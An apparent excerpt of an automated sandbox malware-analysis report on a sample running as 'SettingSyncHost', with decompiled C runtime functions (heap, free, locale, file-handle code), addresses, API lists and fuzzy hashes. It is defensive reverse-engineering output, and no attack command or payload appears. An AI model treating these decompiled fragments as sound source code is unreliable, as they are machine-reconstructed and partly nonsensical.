                                                                                                                                      0x0039f586
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039f58c
                                                                                                                                      0x00000000
                                                                                                                                      0x0039f51f
                                                                                                                                      0x0039f524
                                                                                                                                      0x0039f52a
                                                                                                                                      0x0039f52f
                                                                                                                                      0x00000000
                                                                                                                                      0x0039f52f
                                                                                                                                      0x0039f4e8
                                                                                                                                      0x0039f4ef
                                                                                                                                      0x0039f4f5
                                                                                                                                      0x0039f4f5
                                                                                                                                      0x0039f4f8
                                                                                                                                      0x0039f4fd
                                                                                                                                      0x0039f4fd

                                                                                                                                      APIs
                                                                                                                                      • GetFileType.KERNEL32(?,?,?,003C5F90,0000000C), ref: 0039F4DE
                                                                                                                                      • GetLastError.KERNEL32(?,?,003C5F90,0000000C), ref: 0039F4E8
                                                                                                                                      • __dosmaperr.LIBCMT ref: 0039F4EF
                                                                                                                                      • __alloc_osfhnd.LIBCMT ref: 0039F510
                                                                                                                                      • __set_osfhnd.LIBCMT ref: 0039F53A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 43408053-0
                                                                                                                                      • Opcode ID: 555e7aeba54e9a99c0590e843207f085b292dab2c046b63d3d047f379d0b6aa4
                                                                                                                                      • Instruction ID: 0c7e4d0e2ac97770f8d852a20021e3bb5adb8eec1c100dd5d9e414a690376ceb
                                                                                                                                      • Opcode Fuzzy Hash: 555e7aeba54e9a99c0590e843207f085b292dab2c046b63d3d047f379d0b6aa4
                                                                                                                                      • Instruction Fuzzy Hash: AB2100316012059FDF13AF79C8057AE7B60AF42324F2A8269E4A8CF1D3DB788981DF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003A2A01, Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                      			E003A2A01(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t27;
				long _t30;

				if(_a4 != 0) {
					_push(__esi);
					_t30 = _a8;
					__eflags = _t30;
					if(_t30 != 0) {
						_push(__edi);
						while(1) {
							__eflags = _t30 - 0xffffffe0;
							if(_t30 > 0xffffffe0) {
								break;
							}
							__eflags = _t30;
							if(_t30 == 0) {
								_t30 = _t30 + 1;
								__eflags = _t30;
							}
							_t7 = HeapReAlloc( *0x4ee3c8, 0, _a4, _t30);
							_t27 = _t7;
							__eflags = _t27;
							if(_t27 != 0) {
								L17:
								_t8 = _t27;
							} else {
								__eflags =  *0x4ee414 - _t7;
								if(__eflags == 0) {
									_t9 = E0039960F(__eflags);
									 *_t9 = E003995CD(GetLastError());
									goto L17;
								} else {
									__eflags = E003ACA78(_t7, _t30);
									if(__eflags == 0) {
										_t12 = E0039960F(__eflags);
										 *_t12 = E003995CD(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E003ACA78(_t6, _t30);
						 *((intOrPtr*)(E0039960F(__eflags))) = 0xc;
						goto L12;
					} else {
						E00399DFA(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E003A28EB(__edx, __edi, __esi, _a8);
				}
			}









                                                                                                                                      0x003a2a0a
                                                                                                                                      0x003a2a17
                                                                                                                                      0x003a2a18
                                                                                                                                      0x003a2a1b
                                                                                                                                      0x003a2a1d
                                                                                                                                      0x003a2a2c
                                                                                                                                      0x003a2a5f
                                                                                                                                      0x003a2a5f
                                                                                                                                      0x003a2a62
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x003a2a2f
                                                                                                                                      0x003a2a31
                                                                                                                                      0x003a2a33
                                                                                                                                      0x003a2a33
                                                                                                                                      0x003a2a33
                                                                                                                                      0x003a2a40
                                                                                                                                      0x003a2a46
                                                                                                                                      0x003a2a48
                                                                                                                                      0x003a2a4a
                                                                                                                                      0x003a2aaa
                                                                                                                                      0x003a2aaa
                                                                                                                                      0x003a2a4c
                                                                                                                                      0x003a2a4c
                                                                                                                                      0x003a2a52
                                                                                                                                      0x003a2a94
                                                                                                                                      0x003a2aa8
                                                                                                                                      0x00000000
                                                                                                                                      0x003a2a54
                                                                                                                                      0x003a2a5b
                                                                                                                                      0x003a2a5d
                                                                                                                                      0x003a2a7c
                                                                                                                                      0x003a2a90
                                                                                                                                      0x003a2a76
                                                                                                                                      0x003a2a76
                                                                                                                                      0x003a2a76
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x003a2a5d
                                                                                                                                      0x003a2a52
                                                                                                                                      0x00000000
                                                                                                                                      0x003a2a78
                                                                                                                                      0x003a2a65
                                                                                                                                      0x003a2a70
                                                                                                                                      0x00000000
                                                                                                                                      0x003a2a1f
                                                                                                                                      0x003a2a22
                                                                                                                                      0x003a2a28
                                                                                                                                      0x003a2a28
                                                                                                                                      0x003a2a79
                                                                                                                                      0x003a2a7b
                                                                                                                                      0x003a2a0c
                                                                                                                                      0x003a2a16
                                                                                                                                      0x003a2a16

                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 003A2A0F
                                                                                                                                        • Part of subcall function 003A28EB: __FF_MSGBANNER.LIBCMT ref: 003A2904
                                                                                                                                        • Part of subcall function 003A28EB: __NMSG_WRITE.LIBCMT ref: 003A290B
                                                                                                                                        • Part of subcall function 003A28EB: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0039A7CB,00000001,00000001,00000001,?,00399D52,00000018,003C5EC8,0000000C,00399DE2), ref: 003A2930
                                                                                                                                      • _free.LIBCMT ref: 003A2A22
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocHeap_free_malloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2734353464-0
                                                                                                                                      • Opcode ID: d7791fd93e42498a06925d4e7af06c09a23cf5c9226d6420377d210eeaa364a2
                                                                                                                                      • Instruction ID: 0e875e29c109e043e8502f7d4a6a4accf9afc27d796f2e188dc892001cf866f5
                                                                                                                                      • Opcode Fuzzy Hash: d7791fd93e42498a06925d4e7af06c09a23cf5c9226d6420377d210eeaa364a2
                                                                                                                                      • Instruction Fuzzy Hash: 62114F32400615ABCF376B7DAC45B6B3799EF47370B22452AF849DA162DF348C5087A5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003EC951, Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _free.LIBCMT ref: 003EC969
                                                                                                                                        • Part of subcall function 003E5CBF: RtlFreeHeap.NTDLL(00000000,00000000,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7), ref: 003E5CD5
                                                                                                                                        • Part of subcall function 003E5CBF: GetLastError.KERNEL32(003CB0A7,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7,003CB0A7), ref: 003E5CE7
                                                                                                                                      • _free.LIBCMT ref: 003EC97B
                                                                                                                                      • _free.LIBCMT ref: 003EC98D
                                                                                                                                      • _free.LIBCMT ref: 003EC99F
                                                                                                                                      • _free.LIBCMT ref: 003EC9B1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                      • Opcode ID: 1c2e84f543f16519fb6f77dccdc56431a99d2173eedc11b7a9437f76d2057b93
                                                                                                                                      • Instruction ID: aa970b00710c838f46634bc56736b178e757027d11d37c76c5b8c9ea7a323445
                                                                                                                                      • Opcode Fuzzy Hash: 1c2e84f543f16519fb6f77dccdc56431a99d2173eedc11b7a9437f76d2057b93
                                                                                                                                      • Instruction Fuzzy Hash: F6F0FC72512BA0A7C652EB16F781C2E73D8BA043107692E19F849E77C1CB30FC404A68
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00399554, Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      C-Code - Quality: 90%
                                                                                                                                      			E00399554(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t20 = __ebx;
				_push(0xc);
				_push(0x3c5e58);
				E0039A560(__ebx, __edi, __esi);
				_t28 = E003998D1(__ebx, __edx, _t31);
				_t12 =  *0x3c72f4; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t12) == 0) {
					L6:
					E00399DC7(_t20, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t29 = _t28 + 0x6c;
					 *((intOrPtr*)(_t30 - 0x1c)) = E00399507(_t29,  *0x3c72e8);
					 *(_t30 - 4) = 0xfffffffe;
					E003995C1();
				} else {
					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E003998D1(_t20, __edx, _t33) + 0x6c));
					}
				}
				_t34 = _t29;
				if(_t29 == 0) {
					E003A235F(_t25, _t34, 0x20);
				}
				return E0039A5A5(_t29);
			}








                                                                                                                                      0x00399554
                                                                                                                                      0x00399554
                                                                                                                                      0x00399554
                                                                                                                                      0x00399554
                                                                                                                                      0x00399554
                                                                                                                                      0x00399556
                                                                                                                                      0x0039955b
                                                                                                                                      0x00399565
                                                                                                                                      0x00399567
                                                                                                                                      0x0039956f
                                                                                                                                      0x00399593
                                                                                                                                      0x00399595
                                                                                                                                      0x0039959b
                                                                                                                                      0x003995a5
                                                                                                                                      0x003995b0
                                                                                                                                      0x003995b3
                                                                                                                                      0x003995ba
                                                                                                                                      0x00399571
                                                                                                                                      0x00399571
                                                                                                                                      0x00399575
                                                                                                                                      0x00000000
                                                                                                                                      0x00399577
                                                                                                                                      0x0039957c
                                                                                                                                      0x0039957c
                                                                                                                                      0x00399575
                                                                                                                                      0x0039957f
                                                                                                                                      0x00399581
                                                                                                                                      0x00399585
                                                                                                                                      0x0039958a
                                                                                                                                      0x00399592

                                                                                                                                      APIs
                                                                                                                                      • __getptd.LIBCMT ref: 00399560
                                                                                                                                        • Part of subcall function 003998D1: __getptd_noexit.LIBCMT ref: 003998D4
                                                                                                                                        • Part of subcall function 003998D1: __amsg_exit.LIBCMT ref: 003998E1
                                                                                                                                      • __getptd.LIBCMT ref: 00399577
                                                                                                                                      • __amsg_exit.LIBCMT ref: 00399585
                                                                                                                                      • __lock.LIBCMT ref: 00399595
                                                                                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 003995A9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 938513278-0
                                                                                                                                      • Opcode ID: 9e7326b8770c3678e10dd91c20859e17a378b95aa0b7e8437d31273c8a2771a0
                                                                                                                                      • Instruction ID: 78101413ea7236bacfec26459a6e697dc9ca189b0d726a60a730db0d0090f00b
                                                                                                                                      • Opcode Fuzzy Hash: 9e7326b8770c3678e10dd91c20859e17a378b95aa0b7e8437d31273c8a2771a0
                                                                                                                                      • Instruction Fuzzy Hash: 53F09033A086149AEF27BB6C9802B4E3294AF02720F13024EF858AE1D2DB6459418B56
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003EA5E6, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free
                                                                                                                                      • String ID: *?
                                                                                                                                      • API String ID: 269201875-2564092906
                                                                                                                                      • Opcode ID: b9e3bbee51c13a3c1a228606d860d739400fa8407438fed14ddebdd0105877bc
                                                                                                                                      • Instruction ID: cf0e50317c01a3cd72e83503dec571a736e6a695f0bc1cc84167fabd90475615
                                                                                                                                      • Opcode Fuzzy Hash: b9e3bbee51c13a3c1a228606d860d739400fa8407438fed14ddebdd0105877bc
                                                                                                                                      • Instruction Fuzzy Hash: 52617175D006299FCF15DFA9C8815EDFBF5EF48310B29826AE805F7340E631AE418B91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003CB9C0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 003CBA5F
                                                                                                                                        • Part of subcall function 003DB5C4: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00000000,?,003D9D7C,?,0040752C,?), ref: 003DB624
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                      • API String ID: 3109751735-1866435925
                                                                                                                                      • Opcode ID: 72edc579e28afca4eb969af3f58e7e2554c7ac27e940f2a0bc59440582b2a2ba
                                                                                                                                      • Instruction ID: 3bb050368eb12c625dd405286f2938c292a84ec6921dcce3d0d1ca8d0e72b23d
                                                                                                                                      • Opcode Fuzzy Hash: 72edc579e28afca4eb969af3f58e7e2554c7ac27e940f2a0bc59440582b2a2ba
                                                                                                                                      • Instruction Fuzzy Hash: E311D2B2910708ABC711DF68D802F96F3DCAF45320F15862BFA58DB681F770AD048BA1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003A63DB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      C-Code - Quality: 46%
                                                                                                                                      			E003A63DB(signed int __eax, signed int __ebx, void* __ecx) {
				signed int _t12;
				signed int _t13;
				intOrPtr _t16;
				signed int _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t27;

				asm("sahf");
				_t12 = __eax / __ebx;
				_t21 = __eax % __ebx;
				_t5 = __ebx - 0xa4f43;
				 *_t5 =  *((intOrPtr*)(__ebx - 0xa4f43)) + 1;
				_t27 =  *_t5;
				if(_t27 != 0) {
					_t12 =  *0xFFFFFFFFFFFFEB34;
					 *(_t12 + 0x70) =  *(_t12 + 0x70) & 0xfffffffd;
				}
				_t13 = _t12 | 0xffffffff;
				_pop(_t22);
				_pop(_t23);
				_pop(_t16);
				return E00393C21(_t13, _t16,  *0xFFFFFFFFFFFFF598 ^ 0xfffff59c, _t21, _t22, _t23);
			}










                                                                                                                                      0x003a63e2
                                                                                                                                      0x003a63e3
                                                                                                                                      0x003a63e3
                                                                                                                                      0x003a63e5
                                                                                                                                      0x003a63e5
                                                                                                                                      0x003a63e5
                                                                                                                                      0x003a5a84
                                                                                                                                      0x003a5a86
                                                                                                                                      0x003a5a8c
                                                                                                                                      0x003a5a8c
                                                                                                                                      0x003a5a90
                                                                                                                                      0x003a6c74
                                                                                                                                      0x003a6c75
                                                                                                                                      0x003a6c78
                                                                                                                                      0x003a6c7f

                                                                                                                                      APIs
                                                                                                                                      • DecodePointer.KERNEL32(?,?,?,?,00000000,?,?,?), ref: 003A64FE
                                                                                                                                      • DecodePointer.KERNEL32(?,?), ref: 003A652A
                                                                                                                                      • DecodePointer.KERNEL32(?,?), ref: 003A654C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DecodePointer
                                                                                                                                      • String ID: g
                                                                                                                                      • API String ID: 3527080286-30677878
                                                                                                                                      • Opcode ID: 85c8448092889526ebf0c17c66a1758f175d5f1de101ed0c32c1dcda1b3592b7
                                                                                                                                      • Instruction ID: 6a2e6deb51d51c291547acb04120a5068dc3f6d04d5269cff3f5adcc3c3b9628
                                                                                                                                      • Opcode Fuzzy Hash: 85c8448092889526ebf0c17c66a1758f175d5f1de101ed0c32c1dcda1b3592b7
                                                                                                                                      • Instruction Fuzzy Hash: F0210A75E047289FDB228B55DC45BA9BBB8FB87314F0840EAD40DA2950D7741E85CF12
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 0039E066, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E0039E066() {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t15;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t20;
				intOrPtr _t26;
				intOrPtr _t27;

				_t5 =  *0x4efd40;
				_t26 = 0x14;
				if(_t5 != 0) {
					if(_t5 < _t26) {
						_t5 = _t26;
						goto L4;
					}
				} else {
					_t5 = 0x200;
					L4:
					 *0x4efd40 = _t5;
				}
				_t6 = E0039A7FF(_t5, 4);
				 *0x4ee9f8 = _t6;
				if(_t6 != 0) {
					L8:
					_t19 = 0;
					_t15 = 0x3c7b20;
					while(1) {
						 *((intOrPtr*)(_t19 + _t6)) = _t15;
						_t15 = _t15 + 0x20;
						_t19 = _t19 + 4;
						if(_t15 >= 0x3c7da0) {
							break;
						}
						_t6 =  *0x4ee9f8; // 0x0
					}
					_t27 = 0xfffffffe;
					_t20 = 0;
					_t16 = 0x3c7b30;
					do {
						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x4ee8c0 + (_t20 >> 5) * 4))));
						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
							 *_t16 = _t27;
						}
						_t16 = _t16 + 0x20;
						_t20 = _t20 + 1;
					} while (_t16 < 0x3c7b90);
					return 0;
				} else {
					 *0x4efd40 = _t26;
					_t6 = E0039A7FF(_t26, 4);
					 *0x4ee9f8 = _t6;
					if(_t6 != 0) {
						goto L8;
					} else {
						_t12 = 0x1a;
						return _t12;
					}
				}
			}













                                                                                                                                      0x0039e066
                                                                                                                                      0x0039e06e
                                                                                                                                      0x0039e071
                                                                                                                                      0x0039e07c
                                                                                                                                      0x0039e07e
                                                                                                                                      0x00000000
                                                                                                                                      0x0039e07e
                                                                                                                                      0x0039e073
                                                                                                                                      0x0039e073
                                                                                                                                      0x0039e080
                                                                                                                                      0x0039e080
                                                                                                                                      0x0039e080
                                                                                                                                      0x0039e088
                                                                                                                                      0x0039e08f
                                                                                                                                      0x0039e096
                                                                                                                                      0x0039e0b6
                                                                                                                                      0x0039e0b6
                                                                                                                                      0x0039e0b8
                                                                                                                                      0x0039e0c4
                                                                                                                                      0x0039e0c4
                                                                                                                                      0x0039e0c7
                                                                                                                                      0x0039e0ca
                                                                                                                                      0x0039e0d3
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039e0bf
                                                                                                                                      0x0039e0bf
                                                                                                                                      0x0039e0d7
                                                                                                                                      0x0039e0d8
                                                                                                                                      0x0039e0da
                                                                                                                                      0x0039e0e0
                                                                                                                                      0x0039e0f4
                                                                                                                                      0x0039e0fa
                                                                                                                                      0x0039e104
                                                                                                                                      0x0039e104
                                                                                                                                      0x0039e106
                                                                                                                                      0x0039e109
                                                                                                                                      0x0039e10a
                                                                                                                                      0x0039e116
                                                                                                                                      0x0039e098
                                                                                                                                      0x0039e09b
                                                                                                                                      0x0039e0a1
                                                                                                                                      0x0039e0a8
                                                                                                                                      0x0039e0af
                                                                                                                                      0x00000000
                                                                                                                                      0x0039e0b1
                                                                                                                                      0x0039e0b3
                                                                                                                                      0x0039e0b5
                                                                                                                                      0x0039e0b5
                                                                                                                                      0x0039e0af

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __calloc_crt
                                                                                                                                      • String ID: 0{<$@N
                                                                                                                                      • API String ID: 3494438863-304012756
                                                                                                                                      • Opcode ID: 2457ff4e103e506fae0365797c7065b4cab077a71a10f468a0e20cc1ab64eb72
                                                                                                                                      • Instruction ID: 385fbb4420210b8e1663c85422bb80b1f8181e699f3a4071745beacf3ce3725b
